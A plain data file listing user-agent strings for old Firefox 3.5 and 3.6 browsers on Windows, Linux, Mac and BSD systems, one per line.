Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.4) Gecko/20100513 Firefox/3.6.4 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 5.2; en-CA; rv:1.9.2.4) Gecko/20100523 Firefox/3.6.4
Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-TW; rv:1.9.2.4) Gecko/20100611 Firefox/3.6.4 GTB7.0 ( .NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.2.4) Gecko/20100513 Firefox/3.6.4 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.2.4) Gecko/20100503 Firefox/3.6.4 ( .NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 5.1; nb-NO; rv:1.9.2.4) Gecko/20100611 Firefox/3.6.4 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.9.2.4) Gecko/20100523 Firefox/3.6.4
Mozilla/5.0 (Windows; U; Windows NT 5.1; cs; rv:1.9.2.4) Gecko/20100611 Firefox/3.6.4
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3pre) Gecko/20100405 Firefox/3.6.3plugin1 ( .NET CLR 3.5.30729)
Mozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.9.2.3) Gecko/20100403 Fedora/3.6.3-4.fc13 Firefox/3.6.3
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.3) Gecko/20100403 Firefox/3.6.3
Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.2.3) Gecko/20100401 SUSE/3.6.3-1.1 Firefox/3.6.3
Mozilla/5.0 (X11; U; Linux i686; ko-KR; rv:1.9.2.3) Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.3) Gecko/20100404 Ubuntu/10.04 (lucid) Firefox/3.6.3
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.1
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.3
Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.2.3) Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3
Mozilla/5.0 (X11; U; Linux AMD64; en-US; rv:1.9.2.3) Gecko/20100403 Ubuntu/10.10 (maverick) Firefox/3.6.3
Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3
Mozilla/5.0 (Windows; U; Windows NT 6.1; pl; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3
Mozilla/5.0 (Windows; U; Windows NT 6.1; it; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3
Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.1
Mozilla/5.0 (Windows; U; Windows NT 6.1; es-ES; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.1
Mozilla/5.0 (Windows; U; Windows NT 6.1; es-ES; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0 ( .NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 6.1; es-ES; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 6.1; ca; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)
Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2
Mozilla/5.0 (Windows; U; Windows NT 6.1; fr; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2 GTB7.0
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.2) Gecko/20100316 AskTbSPC2/3.9.1.14019 Firefox/3.6.2
Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2 ( .NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 5.1; pl; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2 GTB6 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2 ( .NET CLR 3.0.04506.648)
Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2 ( .NET CLR 3.0.04506.30)
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.7; en-US; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.10pre) Gecko/20100902 Ubuntu/9.10 (karmic) Firefox/3.6.1pre
Mozilla/5.0 (X11; U; Linux x86_64; ja-JP; rv:1.9.2.16) Gecko/20110323 Ubuntu/10.10 (maverick) Firefox/3.6.16
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.16) Gecko/20110323 Ubuntu/9.10 (karmic) Firefox/3.6.16 FirePHP/0.5
Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.2.16) Gecko/20110319 Firefox/3.6.16
Mozilla/5.0 (Windows; U; Windows NT 6.1; fr; rv:1.9.2.16) Gecko/20110319 Firefox/3.6.16
Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.2.16) Gecko/20110319 Firefox/3.6.16
Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.9.2.16) Gecko/20110319 Firefox/3.6.16 ( .NET CLR 3.5.30729; .NET4.0E)
Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.2.16) Gecko/20110319 Firefox/3.6.16 ( .NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.1.13) Gecko/20100914 Firefox/3.6.16
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.2.16) Gecko/20110319 AskTbUTR/3.11.3.15590 Firefox/3.6.16
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.16pre) Gecko/20110304 Ubuntu/10.10 (maverick) Firefox/3.6.15pre
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.15) Gecko/20110303 Ubuntu/10.04 (lucid) Firefox/3.6.15 FirePHP/0.5
Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.2.15) Gecko/20110330 CentOS/3.6-1.el5.centos Firefox/3.6.15
Mozilla/5.0 (Windows; U; Windows NT 6.1; es-ES; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 ( .NET CLR 3.5.30729; .NET4.0C) FirePHP/0.5
Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.2.15) Gecko/20110303 AskTbBT4/3.11.3.15590 Firefox/3.6.15 ( .NET CLR 3.5.30729; .NET4.0C)
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 (.NET CLR 3.5.30729)
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.14pre) Gecko/20110105 Firefox/3.6.14pre
Mozilla/5.0 (X11; U; Linux armv7l; en-US; rv:1.9.2.14) Gecko/20110224 Firefox/3.6.14 MB860/Version.0.43.3.MB860.AmericaMovil.en.MX
Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.14) Gecko/20110218 Firefox/3.6.14
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-AU; rv:1.9.2.14) Gecko/20110218 Firefox/3.6.14
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.2.14) Gecko/20110218 Firefox/3.6.14 GTB7.1 ( .NET CLR 3.5.30729)
Mozilla/5.0 Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.13) Firefox/3.6.13
Mozilla/5.0 (X11; U; Linux x86_64; pl-PL; rv:1.9.2.13) Gecko/20101206 Ubuntu/10.04 (lucid) Firefox/3.6.13
Mozilla/5.0 (X11; U; Linux x86_64; nb-NO; rv:1.9.2.13) Gecko/20101206 Ubuntu/10.04 (lucid) Firefox/3.6.13
Mozilla/5.0 (X11; U; Linux x86_64; it; rv:1.9.2.13) Gecko/20101206 Ubuntu/10.04 (lucid) Firefox/3.6.13 (.NET CLR 3.5.30729)
Mozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.9.2.13) Gecko/20110103 Fedora/3.6.13-1.fc14 Firefox/3.6.13
Mozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101223 Gentoo Firefox/3.6.13
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101219 Gentoo Firefox/3.6.13
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101206 Red Hat/3.6-3.el4 Firefox/3.6.13
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101206 Firefox/3.6.13
Mozilla/5.0 (X11; U; Linux x86_64; en-NZ; rv:1.9.2.13) Gecko/20101206 Ubuntu/10.10 (maverick) Firefox/3.6.13
Mozilla/5.0 (X11; U; Linux x86_64; en-GB; rv:1.9.2.13) Gecko/20101206 Ubuntu/9.10 (karmic) Firefox/3.6.13
Mozilla/5.0 (X11; U; Linux x86_64; en-GB; rv:1.9.2.13) Gecko/20101206 Red Hat/3.6-2.el5 Firefox/3.6.13
Mozilla/5.0 (X11; U; Linux x86_64; da-DK; rv:1.9.2.13) Gecko/20101206 Ubuntu/10.10 (maverick) Firefox/3.6.13
Mozilla/5.0 (X11; U; Linux MIPS32 1074Kf CPS QuadCore; en-US; rv:1.9.2.13) Gecko/20110103 Fedora/3.6.13-1.fc14 Firefox/3.6.13
Mozilla/5.0 (X11; U; Linux i686; ru; rv:1.9.2.13) Gecko/20101206 Ubuntu/10.10 (maverick) Firefox/3.6.13
Mozilla/5.0 (X11; U; Linux i686; pt-BR; rv:1.9.2.13) Gecko/20101209 Fedora/3.6.13-1.fc13 Firefox/3.6.13
Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.9.2.13) Gecko/20101206 Ubuntu/9.10 (karmic) Firefox/3.6.13
Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.2.13) Gecko/20101209 CentOS/3.6-2.el5.centos Firefox/3.6.13
Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.2.13) Gecko/20101206 Ubuntu/10.10 (maverick) Firefox/3.6.13
Mozilla/5.0 (X11; U; NetBSD i386; en-US; rv:1.9.2.12) Gecko/20101030 Firefox/3.6.12
Mozilla/5.0 (X11; U; Linux x86_64; es-MX; rv:1.9.2.12) Gecko/20101027 Ubuntu/10.04 (lucid) Firefox/3.6.12
Mozilla/5.0 (X11; U; Linux x86_64; es-ES; rv:1.9.2.12) Gecko/20101027 Fedora/3.6.12-1.fc13 Firefox/3.6.12
Mozilla/5.0 (X11; U; Linux x86_64; es-ES; rv:1.9.2.12) Gecko/20101026 SUSE/3.6.12-0.7.1 Firefox/3.6.12
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.12) Gecko/20101102 Gentoo Firefox/3.6.12
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.12) Gecko/20101102 Firefox/3.6.12
Mozilla/5.0 (X11; U; Linux ppc; fr; rv:1.9.2.12) Gecko/20101027 Ubuntu/10.10 (maverick) Firefox/3.6.12
Mozilla/5.0 (X11; U; Linux i686; ko-KR; rv:1.9.2.12) Gecko/20101027 Ubuntu/10.10 (maverick) Firefox/3.6.12
Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.2.12) Gecko/20101027 Ubuntu/10.10 (maverick) Firefox/3.6.12 GTB7.1
Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.2.12) Gecko/20101027 Fedora/3.6.12-1.fc13 Firefox/3.6.12
Mozilla/5.0 (X11; FreeBSD x86_64; rv:2.0) Gecko/20100101 Firefox/3.6.12
Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12 ( .NET CLR 3.5.30729; .NET4.0E)
Mozilla/5.0 (Windows; U; Windows NT 6.0; sv-SE; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12
Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12 (.NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; .NET CLR 3.5.21022)
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; de; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12 GTB5
Mozilla/5.0 (X11; U; Linux x86_64; ru; rv:1.9.2.11) Gecko/20101028 CentOS/3.6-2.el5.centos Firefox/3.6.11
Mozilla/5.0 (X11; U; Linux armv7l; en-GB; rv:1.9.2.3pre) Gecko/20100723 Firefox/3.6.11
Mozilla/5.0 (Windows; U; Windows NT 5.2; ru; rv:1.9.2.11) Gecko/20101012 Firefox/3.6.11
Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.9.2.11) Gecko/20101012 Firefox/3.6.11 ( .NET CLR 3.5.30729)
Mozilla/5.0 (X11; U; Linux x86_64; zh-CN; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10
Mozilla/5.0 (X11; U; Linux x86_64; pt-BR; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10
Mozilla/5.0 (X11; U; Linux x86_64; pl-PL; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10 GTB7.1
Mozilla/5.0 (X11; U; Linux x86_64; el-GR; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10
Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10 GTB7.1
Mozilla/5.0 (X11; U; Linux x86_64; cs-CZ; rv:1.9.2.10) Gecko/20100915 Ubuntu/10.04 (lucid) Firefox/3.6.10
Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.2.10) Gecko/20100915 Ubuntu/10.04 (lucid) Firefox/3.6.10
Mozilla/5.0 (X11; U; Linux i686; fr-FR; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10
Mozilla/5.0 (X11; U; Linux i686; es-AR; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.10) Gecko/20100915 Ubuntu/9.04 (jaunty) Firefox/3.6.10
Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.2.11) Gecko/20101013 Ubuntu/10.10 (maverick) Firefox/3.6.10
Mozilla/5.0 (X11; U; Linux i686; en-CA; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10
Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10
Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.2.10) Gecko/20100915 Ubuntu/9.10 (karmic) Firefox/3.6.10
Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.2.10) Gecko/20100915 Ubuntu/10.04 (lucid) Firefox/3.6.10
Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.2.10) Gecko/20100914 SUSE/3.6.10-0.3.1 Firefox/3.6.10
Mozilla/5.0 (Windows; U; Windows NT 6.1; ro; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10
Mozilla/5.0 (Windows; U; Windows NT 6.1; nl; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10 ( .NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 6.1; fr; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10 (.NET CLR 3.5.30729)
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.1) Gecko/20100122 firefox/3.6.1
Mozilla/5.0(Windows; U; Windows NT 7.0; rv:1.9.2) Gecko/20100101 Firefox/3.6
Mozilla/5.0(Windows; U; Windows NT 5.2; rv:1.9.2) Gecko/20100101 Firefox/3.6
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2) Gecko/20100222 Ubuntu/10.04 (lucid) Firefox/3.6
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2) Gecko/20100130 Gentoo Firefox/3.6
Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.2) Gecko/20100308 Ubuntu/10.04 (lucid) Firefox/3.6
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100312 Ubuntu/9.04 (jaunty) Firefox/3.6
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2) Gecko/20100128 Gentoo Firefox/3.6
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2) Gecko/20100115 Ubuntu/10.04 (lucid) Firefox/3.6
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 FirePHP/0.4
Mozilla/5.0 (X11; Linux i686; rv:2.0) Gecko/20100101 Firefox/3.6
Mozilla/5.0 (X11; FreeBSD i686) Firefox/3.6
Mozilla/5.0 (Windows; U; Windows NT 6.1; ru-RU; rv:1.9.2) Gecko/20100105 MRA 5.6 (build 03278) Firefox/3.6 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 6.1; lt; rv:1.9.2) Gecko/20100115 Firefox/3.6
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.3a3pre) Gecko/20100306 Firefox3.6 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.8) Gecko/20100806 Firefox/3.6
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.2.3) Gecko/20100401 Firefox/3.6;MEGAUPLOAD 1.0
Mozilla/5.0 (Windows; U; Windows NT 6.1; ar; rv:1.9.2) Gecko/20100115 Firefox/3.6
Mozilla/5.0 (Windows; U; Windows NT 6.0; ru; rv:1.9.2) Gecko/20100115 Firefox/3.6
Mozilla/5.0 (Windows; U; Windows NT 6.0; ru; rv:1.9.2) Gecko/20100105 Firefox/3.6 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.2) Gecko/20100115 Firefox/3.6 ( .NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1b5pre) Gecko/20090517 Firefox/3.5b4pre (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1b4pre) Gecko/20090409 Firefox/3.5b4pre
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1b4pre) Gecko/20090401 Firefox/3.5b4pre
Mozilla/5.0 (X11; U; Linux i686; nl-NL; rv:1.9.1b4) Gecko/20090423 Firefox/3.5b4
Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1b4) Gecko/20090423 Firefox/3.5b4 GTB5 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1b4) Gecko/20090423 Firefox/3.5b4 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1b4) Gecko/20090423 Firefox/3.5b4 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1b4) Gecko/20090423 Firefox/3.5b4
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1b4) Gecko/20090423 Firefox/3.5b4 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.1b4) Gecko/20090423 Firefox/3.5b4
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; fr; rv:1.9.1b4) Gecko/20090423 Firefox/3.5b4
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1b4) Gecko/20090423 Firefox/3.5b4 GTB5
Mozilla/5.0 (X11; U; Linux x86_64; it; rv:1.9.1.9) Gecko/20100402 Ubuntu/9.10 (karmic) Firefox/3.5.9 (.NET CLR 3.5.30729)
Mozilla/5.0 (X11; U; Linux x86_64; it; rv:1.9.1.9) Gecko/20100330 Fedora/3.5.9-2.fc12 Firefox/3.5.9
Mozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.9.1.9) Gecko/20100317 SUSE/3.5.9-0.1.1 Firefox/3.5.9 GTB7.0
Mozilla/5.0 (X11; U; Linux x86_64; es-CL; rv:1.9.1.9) Gecko/20100402 Ubuntu/9.10 (karmic) Firefox/3.5.9
Mozilla/5.0 (X11; U; Linux x86_64; cs-CZ; rv:1.9.1.9) Gecko/20100317 SUSE/3.5.9-0.1.1 Firefox/3.5.9
Mozilla/5.0 (X11; U; Linux i686; nl; rv:1.9.1.9) Gecko/20100401 Ubuntu/9.10 (karmic) Firefox/3.5.9
Mozilla/5.0 (X11; U; Linux i686; hu-HU; rv:1.9.1.9) Gecko/20100330 Fedora/3.5.9-1.fc12 Firefox/3.5.9
Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.9.1.9) Gecko/20100317 SUSE/3.5.9-0.1 Firefox/3.5.9
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100401 Ubuntu/9.10 (karmic) Firefox/3.5.9 GTB7.1
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100315 Ubuntu/9.10 (karmic) Firefox/3.5.9
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.4) Gecko/20091028 Ubuntu/9.10 (karmic) Firefox/3.5.9
Mozilla/5.0 (Windows; U; Windows NT 6.1; tr; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 GTB7.1
Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 6.1; fr; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9
Mozilla/5.0 (Windows; U; Windows NT 6.1; et; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9
Mozilla/5.0 (Windows; U; Windows NT 6.0; nl; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 ( .NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 6.0; es-ES; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 GTB5 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.13) Gecko/20101203 Firefox/3.5.9 (de)
Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 GTB7.0 (.NET CLR 3.0.30618)
Mozilla/5.0 (X11; U; Linux x86_64; ru; rv:1.9.1.8) Gecko/20100216 Fedora/3.5.8-1.fc12 Firefox/3.5.8
Mozilla/5.0 (X11; U; Linux x86_64; es-ES; rv:1.9.1.8) Gecko/20100216 Fedora/3.5.8-1.fc11 Firefox/3.5.8
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.8) Gecko/20100318 Gentoo Firefox/3.5.8
Mozilla/5.0 (X11; U; Linux i686; zh-CN; rv:1.9.1.8) Gecko/20100216 Fedora/3.5.8-1.fc12 Firefox/3.5.8
Mozilla/5.0 (X11; U; Linux i686; ja-JP; rv:1.9.1.8) Gecko/20100216 Fedora/3.5.8-1.fc12 Firefox/3.5.8
Mozilla/5.0 (X11; U; Linux i686; es-AR; rv:1.9.1.8) Gecko/20100214 Ubuntu/9.10 (karmic) Firefox/3.5.8
Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.1.8) Gecko/20100214 Ubuntu/9.10 (karmic) Firefox/3.5.8
Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8
Mozilla/5.0 (X11; U; FreeBSD i386; ja-JP; rv:1.9.1.8) Gecko/20100305 Firefox/3.5.8
Mozilla/5.0 (Windows; U; Windows NT 6.1; sl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8
Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729) FirePHP/0.4
Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-TW; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 GTB6
Mozilla/5.0 (Windows; U; Windows NT 5.1; ja; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 GTB7.0 (.NET CLR 3.5.30729)
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2) Gecko/20100305 Gentoo Firefox/3.5.7
Mozilla/5.0 (X11; U; Linux x86_64; cs-CZ; rv:1.9.1.7) Gecko/20100106 Ubuntu/9.10 (karmic) Firefox/3.5.7
Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.9.1.7) Gecko/20091222 SUSE/3.5.7-1.1.1 Firefox/3.5.7
Mozilla/5.0 (Windows; U; Windows NT 6.0; ja; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7 GTB6
Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7 (.NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 5.2; fr; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7 (.NET CLR 3.0.04506.648)
Mozilla/5.0 (Windows; U; Windows NT 5.1; fa; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20091221 MRA 5.5 (build 02842) Firefox/3.5.7 (.NET CLR 3.5.30729)
Mozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.9.1.6) Gecko/20091215 Ubuntu/9.10 (karmic) Firefox/3.5.6
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.6) Gecko/20100117 Gentoo Firefox/3.5.6
Mozilla/5.0 (X11; U; Linux i686; zh-CN; rv:1.9.1.6) Gecko/20091216 Fedora/3.5.6-1.fc11 Firefox/3.5.6 GTB6
Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.9.1.6) Gecko/20091201 SUSE/3.5.6-1.1.1 Firefox/3.5.6 GTB6
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.6) Gecko/20100118 Gentoo Firefox/3.5.6
Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.1.6) Gecko/20091215 Ubuntu/9.10 (karmic) Firefox/3.5.6 GTB6
Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.1.6) Gecko/20091215 Ubuntu/9.10 (karmic) Firefox/3.5.6 GTB7.0
Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.1.6) Gecko/20091215 Ubuntu/9.10 (karmic) Firefox/3.5.6
Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.1.6) Gecko/20091201 SUSE/3.5.6-1.1.1 Firefox/3.5.6
Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.9.1.6) Gecko/20100107 Fedora/3.5.6-1.fc12 Firefox/3.5.6
Mozilla/5.0 (X11; U; Linux i686; ca; rv:1.9.1.6) Gecko/20091215 Ubuntu/9.10 (karmic) Firefox/3.5.6
Mozilla/5.0 (Windows; U; Windows NT 6.1; it; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 ( .NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 6.0; id; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 (.NET CLR 3.5.30729)
